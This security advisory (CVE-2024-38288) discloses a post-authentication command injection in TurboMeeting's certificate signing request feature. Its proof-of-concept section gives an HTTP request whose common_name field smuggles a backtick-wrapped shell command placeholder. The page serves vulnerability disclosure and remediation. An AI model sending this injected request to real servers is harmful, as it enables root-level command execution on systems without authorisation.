Skip to content
GoogleGHSA-gx6g-8mvx-3q5c

TurboMeeting: Post-Authentication Command Injection

High7.2CVE-2024-38288 · Published Jul 24, 2024

### Summary The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges. ### Severity High - An attacker could gain access to execute arbitrary commands on the server with root privileges. ### Proof of Concept ```http POST /as/wapi/generate_csrHTTP/1.1 Host: myonlinemeeting connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 187 sid=SID_HERE&common_name=1"%20out%20/dev/null"`COMMAND_HERE`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR ``` ### Further Analysis To address this vulnerability, a strict input validation and sanitization mechanism to ensure that user-supplied data is properly sanitized before being used in command execution should be implemented. ### Timeline **Date reported**: 4/17/2024 **Date fixed**: **Date disclosed**: 7/24/2024

GitHub advisory

Affected versions

PackageAffectedFixed in
TurboMeeting
Product
all versionsNo fix yet
Details and references
CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Severity from
GitHub (reviewed advisory)
Weakness
CWE-78

More Google advisories

All Google
Advisory
Open Broadcaster Software (OBS): Heap Overflow Vulnerability
HighAug 19, 2024
LibRaw: Out of bounds write in LibRaw::sonyParseSR2
MediumAug 14, 2024
TurboMeeting: Insecure Password Reset Mechanism
High8.1Jul 24, 2024
TurboMeeting: Boolean-based SQL Injection
Critical9.8Jul 24, 2024
Linux Kernel: Vulnerability in the eBPF verifier register limit tracking
MediumJul 16, 2024
Kioxia: Open JTAG Debug Port
High7.3Jul 16, 2024

Critical advisories by email

Wednesdays: the week’s critical and high advisories in the AI and data stack, with the fixed versions. Only in weeks that have some.

Double opt-in. Unsubscribe any time.